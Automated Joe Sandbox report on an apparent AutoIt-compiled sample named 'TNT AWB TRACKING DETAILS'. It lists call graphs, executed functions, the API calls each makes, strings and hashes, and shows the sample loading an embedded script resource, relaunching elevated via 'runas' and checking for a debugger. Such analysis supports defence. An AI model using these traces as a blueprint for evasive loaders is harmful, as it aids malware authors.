106143 ec72ab 106142->106143 106144 efea22 _memset 106142->106144 106145 ec4750 60 API calls 106143->106145 106146 efea3e GetOpenFileNameW 106144->106146 106147 ec72b4 106145->106147 106149 efea8d 106146->106149 106278 ee0791 106147->106278 106151 ec7bcc 59 API calls 106149->106151 106153 efeaa2 106151->106153 106153->106153 106193->106019 106196 ec3d3e __write_nolock 106195->106196 106197 ec7bcc 59 API calls 106196->106197 106201 ec3ea4 Mailbox 106196->106201 106199 ec3d70 106197->106199 106198 ec79f2 59 API calls 106198->106199 106199->106198 106207 ec3da6 Mailbox 106199->106207 106200 ec3e77 106200->106201 106202 ec7de1 59 API calls 106200->106202 106201->106064 106204 ec3e98 106202->106204 106203 ec7de1 59 API calls 106203->106207 106205 ec3f74 59 API calls 106204->106205 106205->106201 106206 ec3f74 59 API calls 106206->106207 106207->106200 106207->106201 106207->106203 106207->106206 106208 ec79f2 59 API calls 106207->106208 106208->106207 106210 ee0db6 Mailbox 59 API calls 106209->106210 106211 ec37fb 106210->106211 106211->106085 106213 ec3eda 106212->106213 106214 ec3ef3 106212->106214 106216 ec8047 59 API calls 106213->106216 106215 ec7bcc 59 API calls 106214->106215 106217 ec3879 106215->106217 106216->106217 106218 ee2efd 106217->106218 106219 ee2f7e 106218->106219 106220 ee2f09 106218->106220 106274 ee2f90 60 API calls 4 library calls 106219->106274 106227 ee2f2e 106220->106227 106272 ee8b28 58 API calls __getptd_noexit 106220->106272 106223 ee2f8b 106223->106110 106224 ee2f15 106273 ee8db6 9 API calls __strnicoll_l 106224->106273 106226 ee2f20 106226->106110 106227->106110 106229 eff17c 106228->106229 106230 ec8ef7 106228->106230 106229->106230 106275 ec8bdb 59 API calls Mailbox 106229->106275 106232 ec8fff 106230->106232 106233 ec8ff8 106230->106233 106234 ec9040 106230->106234 106232->106138 106236 ee0db6 Mailbox 59 API calls 106233->106236 106235 ec9d3c 60 API calls 106234->106235 106235->106232 106236->106232 106238 ec4ee5 85 API calls 106237->106238 106239 f295ca 106238->106239 106276 f29734 96 API calls 2 library calls 106239->106276 106241 f295dc 106242 efd186 106241->106242 106243 ec4f0b 74 API calls 106241->106243 106242->106075 106242->106078 106244 f295f7 106243->106244 106245 ec4f0b 74 API calls 106244->106245 106246 f29607 106245->106246 106247 ec4f0b 74 API calls 106246->106247 106248 f29622 106247->106248 106249 ec4f0b 74 API calls 106248->106249 106250 f2963d 106249->106250 106251 ec4ee5 85 API calls 106250->106251 106252 f29654 106251->106252 106253 ee571c _W_store_winword 58 API calls 106252->106253 106254 f2965b 106253->106254 106255 ee571c _W_store_winword 58 API calls 106254->106255 106256 f29665 106255->106256 106257 ec4f0b 74 API calls 106256->106257 106258 f29679 106257->106258 106277 f29109 GetSystemTimeAsFileTime 106258->106277 106260 f2968c 106261 f296a1 106260->106261 106262 f296b6 106260->106262 106263 ee2d55 _free 58 API calls 106261->106263 106264 f2971b 106262->106264 106265 f296bc 106262->106265 106266 f296a7 106263->106266 106268 ee2d55 _free 58 API calls 106264->106268 106267 f28b06 116 API calls 106265->106267 106269 ee2d55 _free 58 API calls 106266->106269 106270 f29713 106267->106270 106268->106242 106269->106242 106271 ee2d55 _free 58 API calls 106270->106271 106271->106242 106272->106224 106273->106226 106274->106223 106275->106230 106276->106241 106277->106260 106279 ef1940 __write_nolock 106278->106279 106280 ee079e GetLongPathNameW 106279->106280 106281 ec7bcc 59 API calls 106280->106281 106511 ec1055 106516 ec2649 106511->106516 106514 ee2d40 __cinit 67 API calls 106515 ec1064 106514->106515 106517 ec7667 59 API calls 106516->106517 106518 ec26b7 106517->106518 106523 ec3582 106518->106523 106521 ec2754 106522 ec105a 106521->106522 106526 ec3416 59 API calls 2 library calls 106521->106526 106522->106514 106527 ec35b0 106523->106527 106526->106521 106528 ec35bd 106527->106528 106529 ec35a1 106527->106529 106528->106529 106530 ec35c4 RegOpenKeyExW 106528->106530 106529->106521 106530->106529 106531 ec35de RegQueryValueExW 106530->106531 106532 ec3614 RegCloseKey 106531->106532 106533 ec35ff 106531->106533 106532->106529 106533->106532 106534 ec1016 106539 ec4974 106534->106539 106537 ee2d40 __cinit 67 API calls 106538 ec1025 106537->106538 106540 ee0db6 Mailbox 59 API calls 106539->106540 106541 ec497c 106540->106541 106542 ec101b 106541->106542 106546 ec4936 106541->106546 106542->106537 106547 ec493f 106546->106547 106549 ec4951 106546->106549 106548 ee2d40 __cinit 67 API calls 106547->106548 106548->106549 106550 ec49a0 106549->106550 106551 ec7667 59 API calls 106550->106551 106552 ec49b8 GetVersionExW 106551->106552 106553 ec7bcc 59 API calls 106552->106553 106554 ec49fb 106553->106554 106555 ec7d2c 59 API calls 106554->106555 106566 ec4a28 106554->106566 106556 ec4a1c 106555->106556 106557 ec7726 59 API calls 106556->106557 106557->106566 106558 ec4a93 GetCurrentProcess IsWow64Process 106559 ec4aac 106558->106559 106560 ec4b2b GetSystemInfo 106559->106560 106561 ec4ac2 106559->106561 106564 ec4af8 106560->106564 106574 ec4b37 106561->106574 106562 efd864 106564->106542 106566->106558 106566->106562 106567 ec4b1f GetSystemInfo 106570 ec4ae9 106567->106570 106568 ec4ad4 106569 ec4b37 2 API calls 106568->106569 106571 ec4adc GetNativeSystemInfo 106569->106571 106570->106564 106572 ec4aef FreeLibrary 106570->106572 106571->106570 106572->106564 106575 ec4ad0 106574->106575 106576 ec4b40 LoadLibraryA 106574->106576 106575->106567 106575->106568 106576->106575 106577 ec4b51 GetProcAddress 106576->106577 106577->106575 106578 ec3633 106579 ec366a 106578->106579 106580 ec3688 106579->106580 106581 ec36e7 106579->106581 106616 ec36e5 106579->106616 106585 ec374b PostQuitMessage 106580->106585 106586 ec3695 106580->106586 106583 ec36ed 106581->106583 106584 efd0cc 106581->106584 106582 ec36ca DefWindowProcW 106620 ec36d8 106582->106620 106589 ec3715 SetTimer RegisterWindowMessageW 106583->106589 106590 ec36f2 106583->106590 106627 ed1070 10 API calls Mailbox 106584->106627 106585->106620 106587 efd154 106586->106587 106588 ec36a0 106586->106588 106632 f22527 71 API calls _memset 106587->106632 106593 ec36a8 106588->106593 106594 ec3755 106588->106594 106595 ec373e CreatePopupMenu 106589->106595 106589->106620 106597 efd06f 106590->106597 106598 ec36f9 KillTimer 106590->106598 106592 efd0f3 106628 ed1093 340 API calls Mailbox 106592->106628 106600 efd139 106593->106600 106601 ec36b3 106593->106601 106625 ec44a0 64 API calls _memset 106594->106625 106595->106620 106604 efd0a8 MoveWindow 106597->106604 106605 efd074 106597->106605 106623 ec443a Shell_NotifyIconW _memset 106598->106623 106600->106582 106631 f17c36 59 API calls Mailbox 106600->106631 106607 efd124 106601->106607 106611 ec36be 106601->106611 106602 efd166 106602->106582 106602->106620 106604->106620 106608 efd078 106605->106608 106609 efd097 SetFocus 106605->106609 106630 f22d36 81 API calls _memset 106607->106630 106608->106611 106612 efd081 106608->106612 106609->106620 106610 ec370c 106624 ec3114 DeleteObject DestroyWindow Mailbox 106610->106624 106611->106582 106629 ec443a Shell_NotifyIconW _memset 106611->106629 106626 ed1070 10 API calls Mailbox 106612->106626 106616->106582 106618 ec3764 106618->106620 106621 efd118 106622 ec434a 68 API calls 106621->106622 106622->106616 106623->106610 106624->106620 106625->106618 106626->106620 106627->106592 106628->106611 106629->106621 106630->106618 106631->106616 106632->106602

                                                    Executed Functions

                                                    Function 00EC3B3A Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00EC3B68
                                                    • IsDebuggerPresent.KERNEL32 ref: 00EC3B7A
                                                    • GetFullPathNameW.KERNEL32(00007FFF,?,?,00F852F8,00F852E0,?,?), ref: 00EC3BEB
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                      • Part of subcall function 00ED092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00EC3C14,00F852F8,?,?,?), ref: 00ED096E
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EC3C6F
                                                    • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00F77770,00000010), ref: 00EFD281
                                                    • SetCurrentDirectoryW.KERNEL32(?,00F852F8,?,?,?), ref: 00EFD2B9
                                                    • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00F74260,00F852F8,?,?,?), ref: 00EFD33F
                                                    • ShellExecuteW.SHELL32(00000000,?,?), ref: 00EFD346
                                                      • Part of subcall function 00EC3A46: GetSysColorBrush.USER32(0000000F), ref: 00EC3A50
                                                      • Part of subcall function 00EC3A46: LoadCursorW.USER32(00000000,00007F00), ref: 00EC3A5F
                                                      • Part of subcall function 00EC3A46: LoadIconW.USER32(00000063), ref: 00EC3A76
                                                      • Part of subcall function 00EC3A46: LoadIconW.USER32(000000A4), ref: 00EC3A88
                                                      • Part of subcall function 00EC3A46: LoadIconW.USER32(000000A2), ref: 00EC3A9A
                                                      • Part of subcall function 00EC3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00EC3AC0
                                                      • Part of subcall function 00EC3A46: RegisterClassExW.USER32(?), ref: 00EC3B16
                                                      • Part of subcall function 00EC39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00EC3A03
                                                      • Part of subcall function 00EC39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00EC3A24
                                                      • Part of subcall function 00EC39D5: ShowWindow.USER32(00000000,?,?), ref: 00EC3A38
                                                      • Part of subcall function 00EC39D5: ShowWindow.USER32(00000000,?,?), ref: 00EC3A41
                                                      • Part of subcall function 00EC434A: _memset.LIBCMT ref: 00EC4370
                                                      • Part of subcall function 00EC434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00EC4415
                                                    Strings
                                                    • runas, xrefs: 00EFD33A
                                                    • This is a third-party compiled AutoIt script., xrefs: 00EFD279
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                    • String ID: This is a third-party compiled AutoIt script.$runas
                                                    • API String ID: 529118366-3287110873
                                                    • Opcode ID: 43c60d3346f3a229061abd3cbfd0521645c4f42235e044f179df1a9c52637c38
                                                    • Instruction ID: f27fd2d88cad26e00998f931eeed6af383a158d732cba1ed2d8d9fd3fde32b99
                                                    • Opcode Fuzzy Hash: 43c60d3346f3a229061abd3cbfd0521645c4f42235e044f179df1a9c52637c38
                                                    • Instruction Fuzzy Hash: 9151F67090820CABDF11EBB4DD05FFDBBB5AB55B14F00906DF855B21A2CA728607EB21
                                                    Function 00EC49A0 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 942 ec49a0-ec4a00 call ec7667 GetVersionExW call ec7bcc 947 ec4b0b-ec4b0d 942->947 948 ec4a06 942->948 950 efd767-efd773 947->950 949 ec4a09-ec4a0e 948->949 952 ec4a14 949->952 953 ec4b12-ec4b13 949->953 951 efd774-efd778 950->951 954 efd77b-efd787 951->954 955 efd77a 951->955 956 ec4a15-ec4a4c call ec7d2c call ec7726 952->956 953->956 954->951 957 efd789-efd78e 954->957 955->954 965 efd864-efd867 956->965 966 ec4a52-ec4a53 956->966 957->949 959 efd794-efd79b 957->959 959->950 961 efd79d 959->961 964 efd7a2-efd7a5 961->964 967 efd7ab-efd7c9 964->967 968 ec4a93-ec4aaa GetCurrentProcess IsWow64Process 964->968 969 efd869 965->969 970 efd880-efd884 965->970 966->964 971 ec4a59-ec4a64 966->971 967->968 972 efd7cf-efd7d5 967->972 978 ec4aac 968->978 979 ec4aaf-ec4ac0 968->979 973 efd86c 969->973 976 efd86f-efd878 970->976 977 efd886-efd88f 970->977 974 efd7ea-efd7f0 971->974 975 ec4a6a-ec4a6c 971->975 982 efd7df-efd7e5 972->982 983 efd7d7-efd7da 972->983 973->976 986 efd7fa-efd800 974->986 987 efd7f2-efd7f5 974->987 984 efd805-efd811 975->984 985 ec4a72-ec4a75 975->985 976->970 977->973 988 efd891-efd894 977->988 978->979 980 ec4b2b-ec4b35 GetSystemInfo 979->980 981 ec4ac2-ec4ad2 call ec4b37 979->981 994 ec4af8-ec4b08 980->994 999 ec4b1f-ec4b29 GetSystemInfo 981->999 1000 ec4ad4-ec4ae1 call ec4b37 981->1000 982->968 983->968 989 efd81b-efd821 984->989 990 efd813-efd816 984->990 992 ec4a7b-ec4a8a 985->992 993 efd831-efd834 985->993 986->968 987->968 988->976 989->968 990->968 997 efd826-efd82c 992->997 998 ec4a90 992->998 993->968 996 efd83a-efd84f 993->996 1001 efd859-efd85f 996->1001 1002 efd851-efd854 996->1002 997->968 998->968 1004 ec4ae9-ec4aed 999->1004 1007 ec4b18-ec4b1d 1000->1007 1008 ec4ae3-ec4ae7 GetNativeSystemInfo 1000->1008 1001->968 1002->968 1004->994 1006 ec4aef-ec4af2 FreeLibrary 1004->1006 1006->994 1007->1008 1008->1004
                                                    APIs
                                                    • GetVersionExW.KERNEL32(?), ref: 00EC49CD
                                                      • Part of subcall function 00EC7BCC: _memmove.LIBCMT ref: 00EC7C06
                                                    • GetCurrentProcess.KERNEL32(?,00F4FAEC,00000000,00000000,?), ref: 00EC4A9A
                                                    • IsWow64Process.KERNEL32(00000000), ref: 00EC4AA1
                                                    • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00EC4AE7
                                                    • FreeLibrary.KERNEL32(00000000), ref: 00EC4AF2
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00EC4B23
                                                    • GetSystemInfo.KERNEL32(00000000), ref: 00EC4B2F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                    • String ID:
                                                    • API String ID: 1986165174-0
                                                    • Opcode ID: 75cfc2db4825a4984b24c68e2739e32ab2e0817e3c9d7a8faa0128ee43bb33de
                                                    • Instruction ID: c9dcbc0e8926f759767dd0f6ac81d02ca1351e863394d2cab54eec9013b087c6
                                                    • Opcode Fuzzy Hash: 75cfc2db4825a4984b24c68e2739e32ab2e0817e3c9d7a8faa0128ee43bb33de
                                                    • Instruction Fuzzy Hash: 0091397188D7C4CEC731DB7885606AAFFF5AF3A304B08595ED0CBA3A81D221E909D759
                                                    Function 00EC4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1009 ec4e89-ec4ea1 CreateStreamOnHGlobal 1010 ec4ec1-ec4ec6 1009->1010 1011 ec4ea3-ec4eba FindResourceExW 1009->1011 1012 efd933-efd942 LoadResource 1011->1012 1013 ec4ec0 1011->1013 1012->1013 1014 efd948-efd956 SizeofResource 1012->1014 1013->1010 1014->1013 1015 efd95c-efd967 LockResource 1014->1015 1015->1013 1016 efd96d-efd975 1015->1016 1017 efd979-efd98b 1016->1017 1017->1013
                                                    APIs
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00EC4D8E,?,?,00000000,00000000), ref: 00EC4E99
                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00EC4D8E,?,?,00000000,00000000), ref: 00EC4EB0
                                                    • LoadResource.KERNEL32(?,00000000,?,?,00EC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EC4E2F), ref: 00EFD937
                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00EC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EC4E2F), ref: 00EFD94C
                                                    • LockResource.KERNEL32(00EC4D8E,?,?,00EC4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00EC4E2F,00000000), ref: 00EFD95F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                    • String ID: SCRIPT
                                                    • API String ID: 3051347437-3967369404
                                                    • Opcode ID: a2987b44895a5511a69bdf8dd8fb3745b416b63a276c54acd8af695b0e88633b
                                                    • Instruction ID: cfa42535cce34def98912d9d4d51763349a513011992de37dbcba55c106f2599
                                                    • Opcode Fuzzy Hash: a2987b44895a5511a69bdf8dd8fb3745b416b63a276c54acd8af695b0e88633b
                                                    • Instruction Fuzzy Hash: 11115EB5240704BFD7218B65EC48F677BBAFBC5B11F10426CF9099A290DBA2E8059660
                                                    Function 00ECFCE0 Relevance: 5.5, APIs: 3, Instructions: 1040COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharUpper
                                                    • String ID:
                                                    • API String ID: 3964851224-0
                                                    • Opcode ID: 57fbedc0ab15f9b8cf22c88328625ff5b7936d10689eb1873e540d5ce5728ce6
                                                    • Instruction ID: 869ce9a3fd146dc4cf45c08509f715501fabe5bd2e65d98143d126f3114da8fb
                                                    • Opcode Fuzzy Hash: 57fbedc0ab15f9b8cf22c88328625ff5b7936d10689eb1873e540d5ce5728ce6
                                                    • Instruction Fuzzy Hash: 9992AE706083418FD720DF14C580B6AB7E1FF85314F18982DE99AAB3A2D771EC46DB92
                                                    Function 00F2445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,00EFE398), ref: 00F2446A
                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 00F2447B
                                                    • FindClose.KERNEL32(00000000), ref: 00F2448B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FileFind$AttributesCloseFirst
                                                    • String ID:
                                                    • API String ID: 48322524-0
                                                    • Opcode ID: e7211496436267a10a7ed2670f989b1a4a2b6961b46ea2865b6963ae97ce8589
                                                    • Instruction ID: 98b9fc460e058a125a0eec543a91d7bb86edb48a5be83d6e434d61fd322fc6be
                                                    • Opcode Fuzzy Hash: e7211496436267a10a7ed2670f989b1a4a2b6961b46ea2865b6963ae97ce8589
                                                    • Instruction Fuzzy Hash: BBE0D8378109146B4210BB38FC0D4EA775C9E16335F100716FD39C10D0E7F46904B595
                                                    Function 00ECE6A0 Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Variable must be of type 'Object'., xrefs: 00F03E62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Variable must be of type 'Object'.
                                                    • API String ID: 0-109567571
                                                    • Opcode ID: bd5d5a6f3db31c26aec264e2adc6cb77e68c9bb3bb318c5534c1bae7442bd28b
                                                    • Instruction ID: e0ce0f9ee3775f611dca1fed1c976b70c615fec6d2583bfca774248b4df8f49c
                                                    • Opcode Fuzzy Hash: bd5d5a6f3db31c26aec264e2adc6cb77e68c9bb3bb318c5534c1bae7442bd28b
                                                    • Instruction Fuzzy Hash: 07A26975A00209CFCB24CF54CA80FAEB7B6FB59314F28906DE905AB351D776AD42DB90
                                                    Function 00ED09D0 Relevance: 57.3, APIs: 27, Strings: 5, Instructions: 1300windowsleeptimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED0A5B
                                                    • timeGetTime.WINMM ref: 00ED0D16
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED0E53
                                                    • Sleep.KERNEL32(0000000A), ref: 00ED0E61
                                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00ED0EFA
                                                    • DestroyWindow.USER32 ref: 00ED0F06
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00ED0F20
                                                    • Sleep.KERNEL32(0000000A,?,?), ref: 00F04E83
                                                    • TranslateMessage.USER32(?), ref: 00F05C60
                                                    • DispatchMessageW.USER32(?), ref: 00F05C6E
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F05C82
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                    • API String ID: 4212290369-3242690629
                                                    • Opcode ID: bf56556d6fa4df6d76652275a1aef7022323596b1865df1e90b22258335d813c
                                                    • Instruction ID: a908e325d3adecff6fe12dac3c63ccbfe04e357f2b778c54fdb7677932a0fb8c
                                                    • Opcode Fuzzy Hash: bf56556d6fa4df6d76652275a1aef7022323596b1865df1e90b22258335d813c
                                                    • Instruction Fuzzy Hash: A0B2C070608741DFD724DF24C884BABB7E1FF84714F14491EE89AA72A1C7B5E885EB42
                                                    Function 00F29155 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00F28F5F: __time64.LIBCMT ref: 00F28F69
                                                      • Part of subcall function 00EC4EE5: _fseek.LIBCMT ref: 00EC4EFD
                                                    • __wsplitpath.LIBCMT ref: 00F29234
                                                      • Part of subcall function 00EE40FB: __wsplitpath_helper.LIBCMT ref: 00EE413B
                                                    • _wcscpy.LIBCMT ref: 00F29247
                                                    • _wcscat.LIBCMT ref: 00F2925A
                                                    • __wsplitpath.LIBCMT ref: 00F2927F
                                                    • _wcscat.LIBCMT ref: 00F29295
                                                    • _wcscat.LIBCMT ref: 00F292A8
                                                      • Part of subcall function 00F28FA5: _memmove.LIBCMT ref: 00F28FDE
                                                      • Part of subcall function 00F28FA5: _memmove.LIBCMT ref: 00F28FED
                                                    • _wcscmp.LIBCMT ref: 00F291EF
                                                      • Part of subcall function 00F29734: _wcscmp.LIBCMT ref: 00F29824
                                                      • Part of subcall function 00F29734: _wcscmp.LIBCMT ref: 00F29837
                                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F29452
                                                    • _wcsncpy.LIBCMT ref: 00F294C5
                                                    • DeleteFileW.KERNEL32(?,?), ref: 00F294FB
                                                    • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00F29511
                                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F29522
                                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00F29534
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
